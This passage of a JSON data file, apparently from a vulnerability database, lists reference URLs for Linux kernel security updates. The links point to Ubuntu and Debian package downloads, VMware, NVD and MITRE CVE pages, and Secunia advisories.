        "url": "http://ports.ubuntu.com/pool/main/l/linux/char-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-xen_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-server_2.6.27-17.45_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-generic_2.6.28-18.59_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.28-18-lpia_2.6.28-18.59_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-generic_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-server_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc_2.6.24-27.65_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-k8_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-server_2.6.31-19.56_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-386_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.28_2.6.28-18.59_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-server_2.6.31-19.56_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc-smp_2.6.15-55.82_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1027027"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1027016"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/security/advisoiries"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1027026"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1027023"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-0844"
      },
      {
        "trust": 0.1,
        "url": "http://bit.ly/bb3xjv"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/security"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-0844"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1437"
      },
      {
        "trust": 0.1,
        "url": "http://bit.ly/a3ffw8"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1027019"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1027022"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1027024"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-0846"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1027013"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1087"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1027753"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1321"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-0845"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1027020"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4212"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1088"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-0846"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4212"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-0845"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1027014"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/secunia_security_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/blog/71/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/38229/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/about_secunia_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc-smp_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.26_2.6.26-21lenny3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-powerpc64_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-versatile_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64-smp_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-versatile_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mips_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-s390x_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.26-2_2.6.26-21lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-alpha_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-itanium_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-smp_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-sparc_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-mckinley_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-sparc64_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.26_2.6.26-21lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-s390_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.26-2_2.6.26-21lenny2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r4k-ip22_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-mckinley_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390-tape_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-itanium_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-s390x_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-legacy_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0309"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-486_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.26_2.6.26-21lenny2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-powerpc64_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-smp_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-ip32_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-i386_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.26_2.6.26-21lenny2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686-bigmem_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.26_2.6.26-21lenny2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r4k-ip22_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686-bigmem_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686-bigmem_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-mckinley_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-arm_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc-smp_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
